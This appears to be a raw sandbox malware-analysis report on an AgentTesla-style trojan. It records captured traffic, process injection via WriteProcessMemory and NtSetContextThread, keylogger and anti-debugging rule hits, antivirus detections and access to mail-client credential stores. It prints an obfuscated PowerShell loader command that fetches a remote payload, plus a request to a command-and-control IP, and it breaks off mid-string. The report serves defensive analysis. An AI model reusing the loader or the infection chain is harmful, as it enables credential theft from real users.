îN_^Ä~þä…tžÌ¡ÈIÌ@ã³µª‰÷¹5l"µvyH ‡Sx›z~¶ÈYú¯Þqñ2“Ðß
Data received í L~w®ÎK\M)èµ.à…·:ëyD‡¼”B’ëxt*7ÖX€dž)~°7_ŠÂŠ꫈rËÑyÿ‰šr xéů­m{´%¹ ‰¾;ÕI•)b lz©KØlaO§Oœ"Q|¹¡vhSBNô¥k† f„”ý®¦äªÛ$÷5÷Ú§©gãš%š“öAݔcpù¹¨»Ã'þLˆ;\ FP^¯sªî(†òK„üw àµ\Áýëj‰ÕNx?6¥È)£h‘ðܬŸq(«;É­t̂;’b‘ŸkºùT|êþ*e‰-cw÷´LÖé¢ÞOŒÔœúàJzÁ+b˼œ1†q’Ôï:滼8V*åˆ6Ba} 7(?HiKE‰4MÆØÇÕó’Ìœ ¼;{)êrùü€¿/Èq" ú½/\úš'3PØGØ2"Š/Px܋1J6À+–óS{ýf7£‰E6E¦䥐/=‘‘ù’^ÃØLYƒl²¼D1å‰==Ž‡3ÂOõu­½^øt*© µ5@"pÖ³­šë/-ßìÆ<¿}&êW¶š®„•ÒäœFV5<¦v̆/)'ž‰~ä}@†–=ïdwa/,±µ¯m|F‡>,övÒùX4XÓ³Çä­>Å£¿Ñ±âÍhI8É£IŸ"ØgÃM5)xÀÅ×6á;ܘ3Í ÞHŠ{m».b‹â˜¡ð¬¶:p}ýMî×_¦C´™cäkhŸ¯ˆb¼jHÐU¿ÎQÕÑ0*¯ xÛû™¡ä5 3Y¤•@ªi|º¿Ez‘µ¸ÑN0 ¾ߏ¯Þc­ 3ӑ0L.Á}Dw0ÓϚq‘~ëœY3ÉæmûŽsP2 ª µMí©©äóˆ0Î9ÆUV g„–>éV5ËÈAøygøxAÚ÷ž:ÃͲ»‰eˆ„ºßÑÒD~-ø9×C†ð“]ƒ‡J'Û¿Ú»”ó о_ $S¡jqªÔA ^ §#ð³a¥ÄùÙ ;֟eÁ “YY‚ˆ:x ]~7TœC=k½]¹ÆΉ@z †„û¯ÎDƎ&#¤q«swǗ£‡j‚¬¶Ï¾'öŒ“L²ÍüV;jã oäü´æC~^ÌPey+2œH®5?ªX©N] žÂ)ޞ¾ç£àßFùÓÔëÀý‘Ûy'N±Ô­w3–ð{DRwni~ÓA€‰CÖ·ÑAñ>óùF¯ô=M˪ÿ\@Š< f ]îãTwñ¦LÂ]ùRT‘ÇL~ÌñÆ[ã0-ÿ8YRsR#sƒ"ìH-%ÁAŸânøÉ0èµÒZ£l qT÷e ZC®™ã—‹H®]s§€J‹ä¢Ïv£‘·-aƒ¿‡ˆÑ4w(í½¼g•¦¡³ÊÃÃÒDÔFeØ=:½™„žQ[¨kV‰z(óUKtD{’˜ÓŽÎ< XÆ@ |¡ë Aæ²1Óő;„;~Ö^÷$ñº=a‡”ì藷{ÔJš\!¬7ދê÷£Ÿ×\Ðzà³A¦hÇ`××W§¹´i­¬_Û¬Ó¬¿w@ ¦4«Å¼“Ĉ<ŸôTz‡‡!—š€Èu<·-lŒÄ–ÚMC? kÒ]4?ùºº½&ƒ¼ |dä¾(ï§3m5K՗ݹ¶"Wû[Ã{ 7š—0|î~‚ŠîüOE8À¥NÃÝA؆ÿˆ½ q{an «`–×ÒËUC2ä¸CÜ)û¦Ww_‰ÔiKò^J<G“èç *OšÃW Y^+d‰i§mäŒ
Data received º™?¶q…Žõ¤À]ēs}Ì Žîú/ïéÔ1*ФI|c•Ï݄€4Yõ»®&´äFÂh(y (Wñ™EÎ)ˆ¿ªpþ9%Cë䵝¥'Íf2Órßn»ô*&„5ôہTWBʗÀ‡‚òÞH}w3üJZ׶ÙdSÚO¦E(“Šú'’ïcIþ[PJ™ÖRîÛ%í¢¡^ô6§ºÄ’ý×ÿö,Æ;ÛKžƒÞñ{n ˜ºˆwgb{…ºÌþ¯°±Òk¤ÿQÉgÏñd!Ïï—[\í”À‡ `G0¦;ê}üXê3N…9µ FÖ[5ÃðdÙÒހrw‹¤úè9H-@¿,‘7¿hœ¾<¼¼œšƒ–ëz¯‹Ðô®m nûÈ-dÁ秇BlÃR'¾â ìîÕœ†Îx£ söß>¨õॷ–"+1ÍÞ´¦A‹ ;Ž¿ÑNl!D#gË[¯Ò!@á ÿA±°Îtø/>9³9ÐïâðÃašwϽPí&Ð3M˜ Q`tfÕ*å©ÒÁ•~*¤c*“ÄoSÕpoÄÝۏ%˜%‹ ò©Ò•­ø ›Á´X‘¼õ3ßøaSÛÈ]”†ŽAÓ'Hýϔ{ô4ÄËÀÈWr‚c§•Áü’ÂÎý¿ç@­ø[SóÝ8ÞïBí⿞^AÜbáÿT«•Ûó¸¹<•j ±ô|¡`fK̳ÖO‘™À¦.uvšªNÀ¹ˆå €ÖÄp[nBÛ|ýÎW ÓXÝrºÑot Ó3 Û; ·ÀáȲ‚eɹ¿ÉÓ/+ŽÃvóٔã BC6ù¬¨O ’q’˜<oº2ÊÉÚHÐ@Ÿg`ÄôN”"²@îf«‚ q¦÷·ÿ4ßÞMV€jžVíݚP<Ï©ú¦¦õÀ̓ANIúaH8·'é,Hz¾³C {dÇöv›ôK=.!I.á:ö© Éõïóì3$tÓ_û&«2–cF”·/ê2ÂU¬ì9râðáEq™áë!?o¿¡Ç­þD®Xóý ¹yÇ r5¦s´~½ uqŒC þ„y3,ǞörJa&ãŋõ6÷;øѬTÙ¯ÃÉøƀlº¢Ó˜½ iø±KŻɲ`†9£—ÔO±­<€WmT®úhQ eöSv¥ú×±õÄPË*q­ ñ4¼p{WÝÇ{÷€*ÜãPô_Ÿg¨Pq!°á-bQ[¦-Ÿn‡iÒ¹ÍYÉMŽʬ™æ¡·2 Áv‘:šÂ©Ü̝€"¥4=w|z˗ åÓ,TbYȸœÆdÛ_«ò¦¶ D™‹;´Æ‡›c°wžÑÕíŬ_ÜÊ;YÉ¿íüiY0Q "‹P¨>”î…ýNôhD¾º¶åúª)á.ž.§æ2:Kû°³hÏb‡¹| )«uêê,sK–ÂzI§3) 0bWÌÞëcÂs/ƒG#’^B ïY|í¼­—çm}õ Aâ§,Ç ¶NåsP¶)ã^P/áå*œn§oå:*{F!î¯Tã„àAë}yFòyTh“¿—Ê›§ÆWS«l>´:a4Úæ÷#@ X5¾©•/’&{¥ö3´NpHàTŒ¸ÏÚo,iýcœ^j¤²³ÝÒ;ÇF S5¤€ jx/³¼J1áÜ׈öãÒIõĤžfÈt|+]kϼZËýØÆ[ܑ»ïP•‡QènaŽÿ!,Ø!¼ ŗ†°ôuii.._[³<8®Õ@*eœ^p:#¢*Z«„ÑM© Î ê-9P\Rퟦ„ «+ @
Data received ,ÿd8•MaÀ˜lmÇٛBÕY ý›ƒ¥CjóüZ…$½ v‚f’Qžýœï%Ä óÕ@ îÆ#ÑRÔÞYÍÒùn’v½"›Åô0…#ûæ)6}ø+ǧ•À^3 pÈ=}Úp2ތsׅú˪COÆZ¦®à —ÕsW’ÚÀ»è…V¸xâUi2[®ïZnñ*1:ª¤ 4T ùg ñ4ÀÒ+ç¬û·cD–õ۟2o¯/tq¼|T©€MWÆ*Ædx† G'VÛªÖIä°ã%æ*¾ZÇÅ:q§™aߎ}ûñ¼îW õûËãlkõ+–Jžáܽ;xuY:§°Y•fq·˜žž[C³•Ÿ/|Œ=íÂí‘ZT™ç;jƄ^<Hܪ#ñîç8c1 á6èׂÉ̐¢ÛôùÓ]Ü'‹ZÉèYˆ9g¸9kŸõ›`ۘˆá²×š9‹‚‘‚Ý.åœ8d$Ë7y&cxØ>ßú_L¼®ì¯/ÿÑbæúŠî³­MFø€íHKÚ.y¹|JŸ ̂'‰s…ùŽÜÇ@„$ӆÈ—ñ<µ‰ƒƒ^Uh%í/.FR˜+}—èÿ!՞̬œ{áª^þðc3¦ºK³\d„¡”«6¢~Sª7ŶµX©Úö1a¶F¼üð^c>agß.Œ™ÿ§ùXz¾ƒêÌAv06/¸ãYþÃã‚¯Õ ⭋Â)$ïÀ#Ri\u¥½‰³äãEdÚÝcLiíÎ/ PÓêCxdžÞ1 ŽÖÓm”Ò‡;¥Ø^õ›SÝߒ9ltúV˜ ~$Pá'ãNf6WAÇúò/ùYP+À+¼ÿà•4t-ÁQ¨ìû^“¶„F„ÐþÎ&›<®ÒáBû´¯BžŠNƒ) |n-!)‚ÉMv‹qæ­|íÄ/Ù­÷Ô³u­/ßi¹ìiŒÑÑg‘n伅ý+¾閴,ƒZ£(ÿð}<H‚ɵcLûÆ⮯§¼8c08¹oÆJn~—0"4C¼!O~ÓSè<\HBª!‘™—?!E°÷j¾ù7üßïñE„ø·_R|÷Q·–ßËéP>A:²ë4`,ÆÃöU‘&ûŒ$yoÇÒ­F,h„Êšªevµ}¨rBß{ë2+x“œ„ŠÌ:{Q¶Ì²´Óþö°Ó.±ûŽãHäe6{‚Œh$ƒž` ´…`õ*·¹éØ'û $àé0žˆó°Yqt‰Þ²£&ïæM0v,®W=U©-[ðÛ8Ì¼à’ ÅAäÀ^á<âáѤ‚6.uAZh÷8ï»Ä³èôõdÃôÖå7•ìي̽¤¯'y¸Ÿ±-M Èÿ`qB²—ÒÂNé ±ò$ts&v3±8öGûA¹ú{ÔŠ¦˜¸8¦ÖŸ«µàÛ`N¢Ã$ú²Q)g–/ªË®›d©Ó+;(Ì)  Œi±l~4h75D­Ó"äbòV ÜúœÌbZBÉý¿¾ŠQ¡`]ØÍ/…c¦ŽùÍ'¨‡ÕÂün¹Ze+Ë(R:÷©^º!ït˜ñ¹úÞ½cf¿vΚó妜z‚O†oà­l]?[Uâ—Àóª)ñ©|[ºKÎeܪµáOtc”£Ï]b;ª¤Òùfžk®lõ2%ÓԄ§âæՕgŸñóK‹¹‡yP‰±F#§˜¤Ð LCق4†ñãÞÞ‹îª ë34¼J K/“=ùz†”ûH&Ø?³¨Å%iLã.8!–’›"¦„Že¶ýJßU³•¤’/Z¯¬TDµÌ(ÁÅ ÀÊÇ4Ë
Data received 0
Data received øTÐ ?i<HÌ?)x™MñüTÐ^ƒ6ؾ>ùFÐDØSü@c½ú3àˆýÍP ˆ`–5¬âîÀ,ù܂¦•ÎM Âín%nߟ è(s¥„bXù¿3¾Ù¥{™jçâk4lä p*/þÝg&Ä è!6°SI+yãg/v+=žç‡}¢‹ÉqfélöåYØ#v e½Æiëqø‹-åâ´ÉEã·ÆºJ`î"Ð{J„ HBºS³¤ãá`ÉÅ(}‚öi>Îø.·ÜªÀ+B iøº6*T:¬e×P7çVêf–γ„•tž™¾ øEayéó‚“à"~}`l‰rîÀg§X P‹Ö2G3q‚@`í˜M`wož0þÌð½ÖcÓå3‚û¾eCUÙ¢ˆé¹Ä Å¨ºlLL`ø‘;–Ä5)ÙÞU³Zg=(ŠßF'qäïE÷E“iŠö攔QðļàÝŽ¬ »!›ÅÏ-‡K¯mÃ)F*}N؆& U†o«#æW«Ë"Josøø˜ã©§Sé䏊›¥x´°ÝIë¸óó´™Ya‡ø<óó †yA$ÂݕšBoÒWJbڝx˜h³dÛ%OÒ (ìß]5k{ôyʎ(D+å(­hUS‘¬öä‰thÛ¤õvi7[ÏtA(U¨ú…Ñ® ‰µ8Û<‰²Si¼ 5m§ê‰ŽRcLYTõø5ˆJ˪Ïí¡×©c›Sä 4ô‰7kŠ~ˆ;õ½¨²±õˆ]cáõ›0%©°;PÈTxñ‡ÍB¥)Ýî¶N”5·äqLjõÝ'½ß×m°ËËÓõTx½„o£ÇHùêŽ%~Ú²â㍛ ,Ý-¶ë,×ÆS=ú fRȑ6îñ ¾úÅÅØbûܨo°Xc@…gډ°EiãùÌ­B 8ÔÏT+K44:ݱa$'r/©ŠÔÜ¢„r!֚o²k¹¤’¼Â ‡¹ÁàÚbBJk[^]=«p£¤±:<t¦um‚øÅÉKóu¦lJp9íN“µ¹3]( j ªî"a9ː·(÷±m¬€ ç âšäN`@éÒå‰,Êw)à;‡=mÁŽMÄPQ‚g¸Ê&ɣ͆3­ß1ÕKr(‹Šþà:u9:`k‰H{ûÑíÛc½´”„x ‡BI°mm¨]#Ÿ1¼`0d¨ºûy›] ‡Î©Jqfƒ:¯÷ê7ÿ³@Ÿ¢$œL?-¯Cò~ƒ©'¹É ±Ô¢zu±´…‚i/®<øªH»Øì@󒪚MÉ1zÌÃÊ¨à°^¨–çæî€2Uâv¤ɏ!ф31 ©øUY v¢YJ®ý•Û¸!圄Uw$ ~5¦ø¡Ùâ¸+ÀÉl/wè@¾Ôh©WIb#֐Egá{ÿéÓ1Öè8'Ræ|-´aÝزÃÁ@] ù­òlQ/6»Kw;•õ«®«Ebf™Й®E£ô}˄ô£¡’ÀŒG"Õ&¤ÒíV<@ÇføÈQ7 ‘±ÌØÔ/þ¶CŽ”•CtÊ\d­îÚ½  é.¹cÍ"ߙ¨k¥ÓéûðÉ HС–˜û†DF>Éõ«Ê?¥¸e†+Xwk*®ûL_Ã¥í8°Î£TºPÞõÔ@rÛ#íYØ$í…O'§òÆr¡„‘Í VyKîˆâËjðõ(aý¬)g‘hEM +/õw§ J* óäùO@XŽœð
Data sent qme7ó* «¦Œj±Ø²¯6PÃG\”it„Ÿ/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBAÀøi¥“h[J‚t'ÞeT¦©%!Ûu£DqF0IÔl†´AmJ3»ãh\ ò~-õînÀµWGØl£¸»;?0ÊÉÿPb"¡ö½23ÿæ•@Jª°éRÜÚ£‡‰§ ’<ph¿3XçáÅ(mö¹ÍZ
Data sent €IµŽ1HS5j>L¸Ìzl ç¨3k±¸jÜ©¹Iü]ØjàË©Î@¨³pñòÚBìF€)ÓŸ‹¤“nînÕuR×ÓJþ“=À¥¼P>jº!‰aFÝC_“ìPZ9Ëíw qüQöþ6vÖ¥¼¢VjåVsòûÁŠ65².­Èvõ’
Data sent GET /mashilao.txt HTTP/1.1 Host: 95.214.27.121 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Win Trojan AgentTesla rule Win_Trojan_AgentTesla_M_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Run a KeyLogger rule KeyLogger
host 95.214.27.121
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2996
region_size: 196608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000344
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL!; dà 0†¾¤ @ @…l¤OÀFà  H.textĄ † `.rsrcFÀˆ@@.reloc àŽ@B
base_address: 0x00400000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ À¼\Ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName3c9df946-5a0b-48a2-9626-80817a0ac3af.exe(LegalCopyright |)OriginalFilename3c9df946-5a0b-48a2-9626-80817a0ac3af.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042c000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer:   À4
base_address: 0x0042e000
process_identifier: 2996
process_handle: 0x00000344
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2996
process_handle: 0x00000344
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL!; dà 0†¾¤ @ @…l¤OÀFà  H.textĄ † `.rsrcFÀˆ@@.reloc àŽ@B
base_address: 0x00400000
process_identifier: 2996
process_handle: 0x00000344
1 1 0
FireEye VB:Trojan.Valyria.8583
Arcabit VB:Trojan.Valyria.D2187
ESET-NOD32 VBS/Kryptik.UA
Avast VBS:Obfuscated-KJ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8583
MicroWorld-eScan VB:Trojan.Valyria.8583
Tencent Script.Trojan.Generic.Udkl
Emsisoft VB:Trojan.Valyria.8583 (B)
VIPRE VB:Trojan.Valyria.8583
MAX malware (ai score=83)
GData VB:Trojan.Valyria.8583
Google Detected
Ikarus Trojan.VBS.Agent
AVG VBS:Obfuscated-KJ [Cryp]
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Time & API Arguments Status Return Repeated

send

 buffer: qme7ó* «¦Œj±Ø²¯6PÃG\”it„Ÿ/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1440
sent: 118
1 118 0

send

 buffer: FBAÀøi¥“h[J‚t'ÞeT¦©%!Ûu£DqF0IÔl†´AmJ3»ãh\ ò~-õînÀµWGØl£¸»;?0ÊÉÿPb"¡ö½23ÿæ•@Jª°éRÜÚ£‡‰§ ’<ph¿3XçáÅ(mö¹ÍZ
socket: 1440
sent: 134
1 134 0

send

 buffer: €IµŽ1HS5j>L¸Ìzl ç¨3k±¸jÜ©¹Iü]ØjàË©Î@¨³pñòÚBìF€)ÓŸ‹¤“nînÕuR×ÓJþ“=À¥¼P>jº!‰aFÝC_“ìPZ9Ëíw qüQöþ6vÖ¥¼¢VjåVsòûÁŠ65².­Èvõ’
socket: 1440
sent: 133
1 133 0

send

 buffer: GET /mashilao.txt HTTP/1.1 Host: 95.214.27.121 Connection: Keep-Alive
socket: 872
sent: 75
1 75 0
Process injection Process 2768 called NtSetContextThread to modify thread in remote process 2996
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4367550
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000033c
process_identifier: 2996
1 0 0
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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